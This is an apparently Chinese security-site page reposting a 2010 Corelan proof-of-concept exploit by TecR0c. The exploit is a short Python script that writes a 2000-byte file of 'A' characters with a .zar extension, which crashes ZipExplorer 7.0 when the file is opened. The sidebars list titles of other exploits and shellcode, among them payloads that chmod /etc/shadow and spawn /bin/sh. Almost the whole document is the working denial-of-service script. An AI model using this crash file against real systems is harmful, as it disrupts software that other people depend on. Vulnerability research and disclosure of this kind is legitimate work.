首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZipExplorer 7.0 (.zar) DoS
来源:http://www.corelan.be:8800 作者:TecR0c 发布时间:2010-06-01  

#!/usr/bin/python
#
# Title:                ZipExplorer 7.0 (.zar) DoS
# Advisory:             http://www.corelan.be:8800/advisories.php?id=10-045
# Author:               TecR0c - http://tecninja.net/blog
# Found by:             TecR0c - http://twitter.com/TecR0c
# Date:                 June 1st, 2010
# Download:             http://home.online.no/~arnholm/org/exe/ZipX70sh.exe
# Platform:             Windows XP sp3 En
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Usage: Launch Application > Open > Navigate to file > Double click > BOOM

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] ZipExplorer 7.0 (.zar) DoS - by TecR0c"

dos = "\x41" * 2000

mefile = open('tecr0c.zar','w');
mefile.write(dos);
mefile.close()

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GoAheaad Webserver Source Code
·Mediacoder v0.7.3.4672 SEH Exp
·linux/x86 sys_execve("/usr/bin
·linux/x86 Shellcode Polymorphi
·linux/x86 sys_sethostname("PwN
·change mode 0777 of "/etc/shad
·linux/x86 cdrom ejecting shell
·11 bytes sys_kill(-1,9) x86 li
·Windows Seven x64 (cmd) Shellc
·linux/x86 sys_execve("/bin/sh"
·linux/x86 sys_exit(0) shellcod
·change mode 0777 of "/etc/pass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved